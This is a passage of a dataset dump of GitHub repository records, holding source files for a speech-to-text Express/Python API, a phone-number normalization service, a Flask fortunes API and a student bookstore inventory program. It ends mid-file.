repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
BhuwanSingh/Ode_to_Code-
https://github.com/BhuwanSingh/Ode_to_Code-
f719aed02513bf636a558b9d83a4755c6f742bc5
9ba0ef3cdae2897d61b836d93b089ef4030d74cb
605a070abab9095170a2d160feeb59805cac6851
refs/heads/main
2023-06-26T18:38:49.636232
2021-07-29T17:16:59
2021-07-29T17:16:59
374,023,083
0
1
MIT
2021-06-05T04:52:04
2021-06-05T05:47:56
2021-06-05T05:49:18
null
[ { "alpha_fraction": 0.558456301689148, "alphanum_fraction": 0.5629965662956238, "avg_line_length": 23.5, "blob_id": "f67aa2eb7e9d14ac31ba096b188aa00c91076bc0", "content_id": "d33bbd02aec50bc175aaf9a8d1443ef5538ae659", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 881, "license_type": "permissive", "max_line_length": 64, "num_lines": 36, "path": "/index.js", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "const express = require(\"express\");\nconst app = express();\n// const router = express.Router();\nconst fs = require(\"fs\");\nconst PythonShell = require(\"python-shell\").PythonShell;\n\napp.use(express.json());\n\napp.get(\"/api\", (req, res) => {\n console.log(\"here\");\n const a = req.body;\n\n fs.writeFileSync(\"input.json\", JSON.stringify(a), (err) => {\n if (err) {\n console.error(err);\n return;\n }\n });\n\n PythonShell.run(\"main.py\", null, function (err) {\n if (err) throw err;\n console.log(\"finished\");\n var ans = fs.readFileSync(\"output.json\");\n let fans = JSON.parse(ans);\n console.log(\"working-get\");\n res.json({ fans });\n });\n\n});\n\nlet port = process.env.PORT || 3001;\napp.listen(port, () => {\n console.log(`listining on port:${port}`);\n});\n\n// app.use(\"/.netlify/functions/api\" , router);" }, { "alpha_fraction": 0.56561678647995, "alphanum_fraction": 0.5822397470474243, "avg_line_length": 19.972476959228516, "blob_id": "dfdf28fd41b8479661f5d62510bff74142f1d16a", "content_id": "e4832288f8551382a511400f64262b44ff88579d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2286, "license_type": "permissive", "max_line_length": 69, "num_lines": 109, "path": "/main.py", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "import speech_recognition as sr\nimport librosa\nimport json\nimport base64\nimport soundfile as sf\nfrom datetime import 
datetime\nimport re\n\nimport time\nstart_time = time.time()\n\ninput_data = open(\"input.json\",)\ninput_data_dict = json.load(input_data)\n# to_match = input_data_dict[\"options\"]\nif \"options\" in input_data_dict:\n to_match = input_data_dict[\"options\"]\nelse:\n exit()\n\naudio = input_data_dict[\"audio\"]\nquestion = input_data_dict['question_key']\nwav_file = open(\"temp.wav\", \"wb\")\ndecode_string = base64.b64decode(audio)\nwav_file.write(decode_string)\n\nx, _ = librosa.load('./temp.wav', sr=16000)\nsf.write('tmp.wav', x, 16000)\n# wave.open('tmp.wav','r')\n\nfilename = \"tmp.wav\"\n\na = []\n\nr = sr.Recognizer()\nwith sr.AudioFile(filename) as source:\n # listen for the data (load audio to memory)\n audio_data = r.record(source)\n # recognize (convert from speech to text)\n text = r.recognize_google(audio_data)\n text = text.lower()\n a = list(text.split(\" \"))\n\n\n\n# print(to_match)\n\nb = []\nif question == 'q1':\n for i in to_match:\n if i in a:\n b.append(i)\n k = { \"answers\" : b}\n f = open(\"output.json\", \"w+\")\n # arr = a.split()\n f.write(json.dumps(k))\n f.close()\n\n\n# if question == 'q2':\n# num = int(audio.split(\"lakh\")[0])\n\n# limits = []\n\n# limits.append(int(options[0].split(\"<\")[1].split(\"lakh\")[0]))\n\n\n# for i in range(1,len(options)-1):\n# num = int(audio.split(\"lakh\")[0])\n\n# limits = []\n\n# limits.append(int(options[0].split(\"<\")[1].split(\"lakh\")[0]))\n\n\n# for i in range(1,len(options)-1):\n# check = options[i].split(\"-\")\n# upper = int(check[1].split(\"lakh\")[0])\n# limits.append(int(upper))\n\n# pos=-1\n\n# for i in range(0,len(options)-1):\n# if num <= limits[i]:\n# pos=i\n# break\n\n# if pos is -1:\n# print( options[len(options)-1])\n# else:\n# print(options[pos])\n\n\nif question == 'q3':\n listToStr = ' '.join(map(str, a))\n date_time_obj = datetime.strptime(listToStr, '%d/%m/%y %H:%M:%S')\n # b.append[date_time_obj]\n k = { \"answers\" : date_time_obj}\n f = open(\"output.json\", \"w+\")\n # 
arr = a.split()\n f.write(json.dumps(k))\n f.close()\n\n\n# print(b)\n\n\n\nprint(a)\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n" }, { "alpha_fraction": 0.7394636273384094, "alphanum_fraction": 0.7720306515693665, "avg_line_length": 53, "blob_id": "4eb57ee2fcf4ad17a9ab9df7f01f1d9aa8a4d7d9", "content_id": "70bc4413361e476335bc9de8d15bac83ef9e385c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1571, "license_type": "permissive", "max_line_length": 267, "num_lines": 29, "path": "/README.md", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "# Ode_to_Code-\n## Team - Simple coders\n\n#### 1.) Leader - Bhuwan Kumar Singh\n#### 2.) Member 1 - Isha Jain\n#### 3.) Member 2 - Mayank Dubey\n\n## 🎤SPEECH-TO-TEXT-API-GENERATOR\nThe Speech to Text service uses google's speech regognition abilities to convert speech into text.The transcription of incoming audio is sent back to the client with minimal delay. The service is accessed via Heroku interface; a REST HTTP interface is also available.\n\n## API GENERATE\nAPI is the acronym for Application Programming Interface, which is a software intermediary that allows two applications to talk to each other. 
Each time we use an app like Facebook, send an instant message, or check the weather on our phone, we’re using an API.\nWe used INSOMNIA to create,design the API based on index.js,express and used the free hosting abilities of Heroku to generate our API.\n\n# INPUT \nAudio in the form of base64 encoded jason file\n# Output\n![image](https://user-images.githubusercontent.com/63011793/120913767-27901180-c6b7-11eb-95f6-4af41f11ced1.png)\n\n\n## SPEECH RECOGNITION\nFor this purpose we used the python libraries like speech recognition,librosa,json,base64,soundfile etc.This here take your voice in base64 encoding or live audio and converts it into normal string.\n\n## USER INTERFACE\nIt's a basic UI made from html,css and java script\n\n## Corner and edge Cases that are to be avoided-\n1. Directly accessing the API link, which in turn inputs no data in the API. This breaks it and is to be avoided right now.\n2. Trying to process files that do not contain their bitrate causes the API to crash.\n" }, { "alpha_fraction": 0.5692307949066162, "alphanum_fraction": 0.7384615540504456, "avg_line_length": 20.33333396911621, "blob_id": "d9c12f97e8e4e38386d84125f97955947d53205e", "content_id": "64cb256fba01b20f294e47c1bc8175a0f3ac333b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 65, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/requirements.txt", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "librosa==0.8.1\nSoundFile==0.10.3.post1\nSpeechRecognition==3.8.1\n\n" }, { "alpha_fraction": 0.5936577916145325, "alphanum_fraction": 0.6017699241638184, "avg_line_length": 21.983051300048828, "blob_id": "0e0ca731755610aa2e146312bae2563036ca90fe", "content_id": "5bc71ee074d9e007b4c0e0c964bcfa2fbcdc6f10", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1356, "license_type": "permissive", 
"max_line_length": 60, "num_lines": 59, "path": "/live.py", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "import pyttsx3\nimport speech_recognition as sr\nimport json\nimport base64\n\nimport wavio\n\n\n\n# Initialize the recognizer\nr = sr.Recognizer()\n\n\n# Function to convert text to\n# speech\n\nencode_string = open(\"audio.wav\", \"rb\").read()\nwav_file = open(\"temp.wav\", \"wb\")\ndecode_string = base64.b64decode(encode_string)\nwav_file.write(decode_string)\nfilename='temp.wav'\n\nwavio.write(filename, temp, fs ,sampwidth=2)\n#def SpeakText(command):\n # Initialize the engine\n # engine = pyttsx3.init()\n # engine.say(command)\n # engine.runAndWait()\n\n\n# Loop infinitely for user to\n# speak\n\nwhile(1):\n\n # Exception handling to handle\n # exceptions at the runtime\n try:\n with sr.AudioFile(filename) as source:\n # listen for the data (load audio to memory)\n audio_data = r.record(source)\n # recognize (convert from speech to text)\n text = r.recognize_google(audio_data)\n print(text)\n\n\n text = text.lower()\n f=open(\"output.txt\",\"w+\")\n arr = text.split()\n f.write(json.dumps(arr))\n f.close()\n\n print(\"Did you say \" + text)\n\n except sr.RequestError as e:\n print(\"Could not request results; {0}\".format(e))\n\n except sr.UnknownValueError:\n print(\"unknown error occured\")\n" } ]
5
ivan-shishkov/29_phones
https://github.com/ivan-shishkov/29_phones
3b22b48aded70f29e77667cd0d9595c361541f15
56e2c3a15710585203bc7de38258ec9eabe71488
fdfe3045a2f9e6b5cc4514fdd63dd657d5b4a3d6
refs/heads/master
2020-04-10T10:40:39.399479
2018-12-26T20:57:10
2018-12-26T20:57:10
160,972,938
0
0
null
2018-12-08T19:45:07
2016-12-25T21:05:41
2016-12-30T09:23:07
null
[ { "alpha_fraction": 0.4931506812572479, "alphanum_fraction": 0.7123287916183472, "avg_line_length": 17.25, "blob_id": "5e84f812bc3e8c452122b58c43105295427f016e", "content_id": "44ef65c87bd1d9c73710da991020392ecdda0730", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 73, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/requirements.txt", "repo_name": "ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "alembic==1.0.5\nphonenumbers==8.10.2\npsycopg2==2.7.6.1\nSQLAlchemy==1.2.14\n" }, { "alpha_fraction": 0.7714502811431885, "alphanum_fraction": 0.7737281918525696, "avg_line_length": 27.021276473999023, "blob_id": "26cf9680e9bfc1fd1e03518a064a0e8b02ba0c98", "content_id": "3a7f03ff23253c5ef33be297fb058bce4d02cb8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1317, "license_type": "no_license", "max_line_length": 158, "num_lines": 47, "path": "/README.md", "repo_name": "ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "# Microservice for Search Index of Phone Numbers\n\nThis service allows you to normalize the phone numbers in the table with orders info for the online store database.\nThis will make it convenient and quick to search for orders by phone number.\n\n# Quickstart\n\nFor service launch need to install Python 3.5 and then install all dependencies:\n\n```bash\n\n$ pip install -r requirements.txt\n\n```\n\n## Used Environment Variables\n\n* **DATABASE_URI** - a database URI\n\n## Adding a New Column to a Database Table\n\nTo perform this operation, you must have access to the database with permissions to change the structure of the tables.\n\nTo add a new column in which phone numbers will be stored in a normalized form, you need to run:\n\n```bash\n\n$ export DATABASE_URI='postgresql://username:password@db_host/db_name'\n$ alembic upgrade head\n\n```\n\n## Running of Phone Numbers 
Normalization Script in Background\n\nTo run the phone numbers normalization script in background need to execute:\n\n```bash\n\n$ nohup python3 normalize_phones.py &\n\n```\n\nAfter that, the script will periodically check the appearance of orders with unnormalized telephone numbers in the background and perform their normalization.\n\n# Project Goals\n\nThe code is written for educational purposes. Training course for web-developers - [DEVMAN.org](https://devman.org)\n" }, { "alpha_fraction": 0.7389635443687439, "alphanum_fraction": 0.7504798173904419, "avg_line_length": 26.421052932739258, "blob_id": "91b69de34f26f42203063df99d11c05b0de44579", "content_id": "67a1e478f1e205775fc3d524dabb2f211f7d2b7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/db.py", "repo_name": "ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "import os\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy import create_engine, Column, Integer, String\n\nBase = declarative_base()\n\nengine = create_engine(os.environ.get('DATABASE_URI'))\n\ndb_session = scoped_session(sessionmaker(bind=engine))\n\n\nclass Order(Base):\n __tablename__ = 'orders'\n\n id = Column(Integer, primary_key=True)\n contact_phone = Column(String(100))\n contact_phone_normalized = Column(String(100), index=True)\n" }, { "alpha_fraction": 0.6264526844024658, "alphanum_fraction": 0.6319867372512817, "avg_line_length": 24.45070457458496, "blob_id": "7900afe56bd272dd62905ffbda3824074fc760de", "content_id": "7c99ac0bbce3e9a43c5ddfe25544103e238f950c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1807, "license_type": "no_license", "max_line_length": 75, "num_lines": 71, "path": "/normalize_phones.py", "repo_name": 
"ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "import time\nimport re\n\nfrom sqlalchemy.exc import OperationalError\nimport phonenumbers\nfrom phonenumbers.phonenumberutil import NumberParseException\n\nfrom db import db_session, Order\n\nTIMEOUT_BETWEEN_PHONES_NORMALIZATION_CYCLES = 5 * 60\nTIMEOUT_WHEN_ERROR = 10\nTIMEOUT_BETWEEN_TRANSACTIONS = 5\n\n\ndef get_normalized_phone_number(source_phone_number, region='RU'):\n if source_phone_number is None:\n return ''\n\n cleared_phone_number = ''.join(re.findall(r'\\d+', source_phone_number))\n\n if cleared_phone_number.startswith('8'):\n cleared_phone_number = '{}{}'.format(\n phonenumbers.country_code_for_valid_region(region),\n cleared_phone_number,\n )\n try:\n return str(\n phonenumbers.parse(\n cleared_phone_number,\n region,\n ).national_number,\n )\n except NumberParseException:\n return ''\n\n\ndef normalize_contact_phones(orders):\n for order in orders:\n order.contact_phone_normalized = get_normalized_phone_number(\n order.contact_phone,\n )\n db_session.commit()\n\n\ndef run_phones_normalization_cycle(count_rows_per_transaction=100):\n while True:\n orders = db_session.query(Order).filter(\n Order.contact_phone_normalized.is_(None),\n ).limit(count_rows_per_transaction).all()\n\n if not orders:\n break\n\n normalize_contact_phones(orders)\n\n time.sleep(TIMEOUT_BETWEEN_TRANSACTIONS)\n\n\ndef main():\n while True:\n try:\n run_phones_normalization_cycle()\n except OperationalError:\n db_session.rollback()\n time.sleep(TIMEOUT_WHEN_ERROR)\n continue\n time.sleep(TIMEOUT_BETWEEN_PHONES_NORMALIZATION_CYCLES)\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.5936395525932312, "alphanum_fraction": 0.6378092169761658, "avg_line_length": 17.25806427001953, "blob_id": "3d2b85dc90e8efe3978bf84b3ba4ca1bf719928e", "content_id": "1cab4633a97112245d28c350a08399a2879105af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 566, 
"license_type": "no_license", "max_line_length": 56, "num_lines": 31, "path": "/alembic/versions/ece6c9ebeb97_add_normalized_contact_phone_column.py", "repo_name": "ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "\"\"\"add normalized contact phone column\n\nRevision ID: ece6c9ebeb97\nRevises: \nCreate Date: 2018-12-09 21:46:17.286164\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ece6c9ebeb97'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\n 'orders',\n sa.Column(\n 'contact_phone_normalized',\n sa.String(length=100),\n index=True,\n ),\n )\n\n\ndef downgrade():\n op.drop_column('orders', 'contact_phone_normalized')\n" } ]
5
miguxbe/FaaS
https://github.com/miguxbe/FaaS
e53522b73c3629f4ae9540a087aadf9875e25483
fbfe6aa21aef7482652f613bedd8dd8ec4c0504a
75390f6c219fe6d86afb72d3d3a491fed967905c
refs/heads/master
2021-01-19T18:10:24.462014
2014-07-14T17:45:59
2014-07-14T17:45:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7475728392601013, "alphanum_fraction": 0.7475728392601013, "avg_line_length": 16.33333396911621, "blob_id": "e265569a9e05ec12a34781b51f8c76581d7951b4", "content_id": "6ddcbd3c47040c4a48d1e778b9580db13fc3e541", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 103, "license_type": "no_license", "max_line_length": 47, "num_lines": 6, "path": "/readme.md", "repo_name": "miguxbe/FaaS", "src_encoding": "UTF-8", "text": "Fortunes as a Service (FaaS)\n===\n\nA simple but useful REST service. Just for fun.\n\nStill in development" }, { "alpha_fraction": 0.6188162565231323, "alphanum_fraction": 0.625, "avg_line_length": 25.647058486938477, "blob_id": "f7d58e2bd1a1e660f05fdf40029c4bdf5caedb2f", "content_id": "d07dcc35de48d9b527154c501160b917f5fd3ca5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2264, "license_type": "no_license", "max_line_length": 81, "num_lines": 85, "path": "/app.py", "repo_name": "miguxbe/FaaS", "src_encoding": "UTF-8", "text": "#!flask/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n Fortunes as a Service (faas)\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n A simple but useful REST service. 
Just for fun.\n \n\"\"\"\n\nimport os\nfrom flask import Flask, jsonify, g\nimport json\nimport sqlite3 as q\nimport random\n\napp = Flask(__name__)\n\n# Load default config and override config from an environment variable\napp.config.update(dict(\n DATABASE = os.path.join(app.root_path,'fortunes.db'),\n DEBUG = True\n))\napp.config.from_envvar('FAAS_SETTINGS', silent = True)\n\ndef connect_db():\n \"\"\"Connects to the databse\"\"\"\n con = q.connect(app.config['DATABASE'])\n con.row_factory = q.Row\n return con\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\[email protected]_appcontext\ndef close_db(error):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n# Retive all fortunes stored in the DDBB\[email protected]('/fortunes/api/v1.0/all', methods = ['GET'])\ndef get_all():\n db = get_db()\n cur = db.execute('select * from fortunes order by id asc')\n recs = cur.fetchall()\n rows = [ dict(rec) for rec in recs] \n rows_json = json.dumps(rows, sort_keys=True, indent=4, separators=(',',': '))\n #print rows_json\n return rows_json\n\n# Just retive a fortune\[email protected]('/fortunes/api/v1.0/<int:fortune_id>', methods = ['GET'])\ndef get_by_id(fortune_id):\n # respone = filter(lambda t: t['id'] == fortune_id, fortunes)\n db = get_db()\n cur = db.execute(\"select * from fortunes where id = '%i'\" % fortune_id)\n res = cur.fetchall()\n return jsonify({'fortunes': res})\n\[email protected]('/fortunes/api/v1.0/rand')\ndef get_rand():\n db = get_db()\n cur = db.execute('select * from fortunes')\n count = cur.rowcount\n rand_id = random.randrange(0,count)\n return jsonify({'fortunes': fortunes[rand_id]})\n\[email protected]('/fortunes/api/v1.0/count')\ndef get_count():\n db = get_db()\n cur = db.execute('select conunt(*) from 
fortunes')\n\n# @app.route('/gulfort/api/v1.0/count')\n# def get_count():\n\n\nif __name__ == '__main__':\n app.run(debug = True)" } ]
2
cw02048/python-numpy-pandas
https://github.com/cw02048/python-numpy-pandas
afa4814051de095c73e64e91facdb418b59bece6
e01f833e2b3ffe140bc61031535b44529f6f8c01
eb94082c7e69da04d068f253afac7e33927aa48c
refs/heads/master
2020-07-29T11:21:12.005661
2019-12-15T07:12:36
2019-12-15T07:12:36
209,779,746
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6477272510528564, "alphanum_fraction": 0.6704545617103577, "avg_line_length": 16.600000381469727, "blob_id": "438c9f650a6581c6de3b5407dbce133612eca48d", "content_id": "3065d7baaaa93ee0800d991a8290597c076ae3cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 764, "license_type": "no_license", "max_line_length": 49, "num_lines": 20, "path": "/README.md", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# Python (NumPy & Pandas) Study\n파이썬 과제\n\n첫 번째 과제: 받은 정수의 진수를 변경\n\n두 번째 과제: 프로그램은 다음과 같은 기능을 사용자에게 제공하여야 함\n\n입력기능\n1. 서점의 재고는 파일에 저장되어 있으며, 이 파일의 데이터를 입력 받아 프로그램 종작\n\n사용자 서비스 기능\n1. 재고의 데이터를 저자의 이름 순으로 정렬하여 출력\n2. 특정 작가의 작품을 제목 순으로 출력\n3. 새로운 서적 정보 입력\n4. 특정 서적의 가격 정보 변경\n5. 특정 서적의 재고 숫자 변경\n6. 재고에 있는 전체 서적의 재고 숫자 출력\n7. 재고에 있는 서적들에 대한 전체 가격 출력\n\n세 번째 과제: 이미지 필터링\n" }, { "alpha_fraction": 0.5150273442268372, "alphanum_fraction": 0.5226986408233643, "avg_line_length": 28.19325065612793, "blob_id": "3b1a73ecf52bb1742748221fe1d74451a43ad436", "content_id": "65f82b61c0b5742dbdcd7b7ca989b90de6f394a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11382, "license_type": "no_license", "max_line_length": 152, "num_lines": 326, "path": "/assignment2/assignment2.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 24 13:57:46 2019\n\n@author: cw020\n\"\"\"\n\nimport os\n\n#프로그램 실행 시 인사 출력 함수\ndef greeting() :\n \n print('welcome to the bookstore program!')\n \n return\n\n# 입력한 이름의 파일이 경로에 있는지 확인해주고, 파일을 읽어서 딕셔너리에 저장해주는 함수\ndef readDatabase(theInventory) :\n \n # 올바른 파일명을 입력할 때까지 반복\n while True :\n \n fileName = input('Enter the name of the file: ')\n \n # 경로에 존재하는 파일명을 입력할 때까지 반복 \n if os.path.isfile(fileName) == True :\n break\n \n else :\n print('Error reading database')\n \n # 파일을 읽어서 딕셔너리에 저장\n 
parsingDatabase(fileName, theInventory)\n \n return\n \n# 파일을 읽어서 딕셔너리에 저장하는 함수\ndef parsingDatabase(fileName, theInventory):\n \n file = open(fileName)\n \n # 파일의 끝까지 한 줄씩 읽어서 저장\n while True: \n \n line = file.readline() # 한 줄씩 읽고,\n line = line.rstrip('\\n') # 줄바꿈 문자 제거\n \n # 파일의 끝이면 파일을 닫고 함수 종료\n if line == '' :\n file.close() \n return\n \n else :\n # ,로 구별하여 리스트에 저장\n line = line.split(',')\n \n # 만약 이미 존재하는 저자명이면 리스트에 합쳐줌\n if line[0] + ', ' + line[1] in theInventory :\n theInventory[line[0] + ', ' + line[1]].append([line[2], line[3], line[4]]) \n \n # 만약 새로 들어가는 저자명이면 새로 저장해줌\n else:\n theInventory.update({line[0] + ', ' + line[1]: [[line[2], line[3], line[4]]]})\n \n# 사용자 메뉴를 출력해주는 함수, 입력한 choice를 리턴함\ndef printMenu() :\n \n print('\\n---------------------------------')\n print('Enter 1 to display the inventory')\n print('Enter 2 to display the books by one author')\n print('Enter 3 to add a book')\n print('Enter 4 to change the price')\n print('Enter 5 to change the qty on hand')\n print('Enter 6 to view the total number of books in the inventory')\n print('Enter 7 to see the total amount of the entire inventory')\n print('Enter 8 to exit')\n choice = input('Enter your choice: ')\n \n return choice\n\n# 딕셔너리의 전체 정보를 출력해주는 함수\ndef displayInventory(theInventory) :\n \n # 저자를 이름 순으로 정렬\n for (author, book) in sorted(theInventory.items()): \n print('The author is: ' + author)\n \n # 책의 제목 순으로 정렬하여 출력\n for [title, qty, price] in sorted(book): \n print('\\n The title is: ' + title + '\\n The qty is: ' + qty + '\\n The price is: ' + price + '\\n\\n ----')\n \n return\n\n# 원하는 저자의 책 정보를 출력해주는 함수\ndef displayAuthorsWork(theInventory) :\n \n # 이름의 앞글자들만 대문자로 바꿔줌\n firstName = input('Enter the author\\'s first name: ').lower().title()\n lastName = input('Enter the author\\'s last name: ').lower().title()\n \n # 저자의 입력 형식을 맞춰줌\n author = lastName + ', ' + firstName\n \n # 딕셔너리에 저자가 없을 때\n if (author in theInventory) == False: \n print('Sorry, but no books by ' + 
author + ' in the inventory') \n return\n \n # 딕셔너리에 저자가 있으면 책의 제목 순으로 출력\n else: \n for [title, qty, price] in sorted(theInventory[author]): \n print(' The title is: ' + title + '\\n The qty is: ' + qty + '\\n The price is: ' + price + '\\n\\n ----') \n \n return\n\n# 딕셔너리에 책을 추가하는 함수\ndef addBook(theInventory) :\n \n # 이름의 앞글자들만 대문자로 바꿔줌\n firstName = input('Enter the author\\'s first name: ').lower().title()\n lastName = input('Enter the author\\'s last name: ').lower().title() \n title = input('Enter the title: ').lower().title()\n \n # 저자의 입력 형식을 맞춰줌\n author = lastName + ', ' + firstName\n \n # 이미 책이 존재할 때 메세지 출력\n if checkExisting(author, title, theInventory).isdigit(): \n print('This book is already in the Inventory and cannot be added again')\n \n # 저자만 존재할 때는 책 정보를 입력받아서 출력\n elif checkExisting(author, title, theInventory) == 'existing author': \n qty = inputQty()\n price = inputPrice()\n theInventory[author].append([title, qty, price])\n \n # 저자가 존재하지 않으면 딕셔너리에 새로운 키과 값을 생성\n else: \n qty = inputQty()\n price = inputPrice()\n theInventory.update({author: [[title, qty, price]]})\n \n return\n\n# 입력받은 저자와 책 제목이 존재하는지 판별하는 함수\ndef checkExisting(author, title, theInventory):\n \n # 저자가 존재하는지 확인\n if author in theInventory: \n cnt = 0\n \n # 책이 존재하는지 확인\n for i in theInventory[author]:\n \n # 책이 존재한다면 몇 번째 리스트에 존재하는지 리턴\n if title in i: \n return str(cnt)\n cnt += 1\n return 'existing author' # 저자만 존재할 때 출력\n \n # 저자가 존재하지 않을 때\n else:\n return 'no author'\n\n# 올바른 재고 값을 입력받는 함수\ndef inputQty():\n \n # 올바른 재고 값을 입력할 때까지 반복\n while True: \n qty = input('Enter the qty: ')\n \n # 숫자인지 확인\n if(qty.isdigit() == True):\n qty = float(qty)\n \n # 양의 정수인지 확인\n if (qty % 1 == 0 and qty > 0):\n return str(int(qty))\n \n # 잘못된 입력일 경우\n print('Invalid input for qty.')\n\n# 올바른 책의 가격을 입력받는 함수\ndef inputPrice():\n \n # 올바른 가격을 입력할 때까지 반복\n while True: \n price = input('Enter the price: ')\n \n # 양의 실수만 받음\n if(len(price) == 4 and price[1] == '.' 
and price.replace('.', '', 1).isdigit() == True): \n \n if 0.00 < float(price) <= 9.99: \n return str(price)\n \n # 잘못된 입력일 경우\n print('Invalid input for price.')\n \n return\n\n# 책의 가격을 변경해주는 함수\ndef changePrice(theInventory) :\n \n # 이름의 앞글자들만 대문자로 바꿔줌\n firstName = input('Enter the author\\'s first name: ').lower().title()\n lastName = input('Enter the author\\'s last name: ').lower().title() \n # 저자의 입력 형식을 맞춰줌\n author = lastName + ', ' + firstName\n \n # 만약 저자가 존재하면\n if author in theInventory:\n title = input('Enter the title: ').lower().title()\n \n # 만약 존재하는 책이면\n if checkExisting(author, title, theInventory).isdigit():\n price = inputPrice() # 바꿀 값을 입력\n print('Price will be updated from ' + theInventory[author][int(checkExisting(author, title, theInventory))][2] + ' to ' + price)\n # 입력받은 값으로 변경\n theInventory[author][int(checkExisting(author, title, theInventory))][2] = price \n \n # 저자는 있고 책이 없을 때\n else:\n print('No book with the title ' + title + ' by ' + author + ' in inventory.')\n # 저자가 없을 때\n else:\n print('No such author in your database. 
So you cannot change the price')\n \n return\n\n# 책의 재고를 변경해주는 함수\ndef changeQty(theInventory) :\n \n # 이름의 앞글자들만 대문자로 바꿔줌\n firstName = input('Enter the author\\'s first name: ').lower().title()\n lastName = input('Enter the author\\'s last name: ').lower().title() \n # 저자의 입력 형식을 맞춰줌\n author = lastName + ', ' + firstName\n \n # 만약 저자가 존재하면\n if author in theInventory:\n title = input('Enter the title: ').lower().title()\n \n # 만약 존재하는 책이면\n if checkExisting(author, title, theInventory).isdigit():\n qty = inputQty() # 바꿀 값을 입력\n print('Qty will be updated from ' + theInventory[author][int(checkExisting(author, title, theInventory))][1] + ' to ' + qty)\n # 입력받은 값으로 변경\n theInventory[author][int(checkExisting(author, title, theInventory))][1] = qty \n \n # 저자는 있고 책이 없을 때 \n else:\n print('No book with the title ' + title + ' by ' + author + ' in inventory.')\n # 저자가 없을 때\n else:\n print('No such author in your database. So you cannot change the qty')\n \n return\n\n# 책의 재고의 총합을 계산해주는 함수\ndef totalQty(theInventory) :\n \n total = 0 # 재고를 저장할 변수\n \n # 모든 저자들을 반복\n for author in list(theInventory.keys()): \n \n # 각 책의 재고 값을 꺼내고 부동소수점 때문에 소수 2번째자리까지 반올림해서 더해줌\n for book in theInventory[author]:\n total = round(total + int(book[1]), 2)\n \n # 결과 값 출력\n print('The total number of books is ' + str(total))\n \n return\n\n# 책의 가격의 총합을 계산해주는 함수\ndef calculateTotalAmount(theInventory) :\n \n total = 0.00 # 가격을 저장할 변수\n \n # 모든 저자들을 반복\n for author in list(theInventory.keys()):\n \n # 각 책의 재고 값과 가격을 곱해서 tatal에 더해줌 (부동소수점 때문에 소수 2번째자리까지 반올림해서 더해줌)\n for book in theInventory[author]:\n total = round(total + int(book[1]) * float(book[2]), 2)\n \n # 결과 값 출력\n print('The total value of the inventory is $' + str(total))\n \n return\n\n# 메인문\ndef main() :\n \n theInventory = {}\n greeting()\n readDatabase(theInventory)\n \n while True: \n \n choice = printMenu()\n \n if choice == '1':\n displayInventory(theInventory)\n elif choice == '2':\n displayAuthorsWork(theInventory)\n elif 
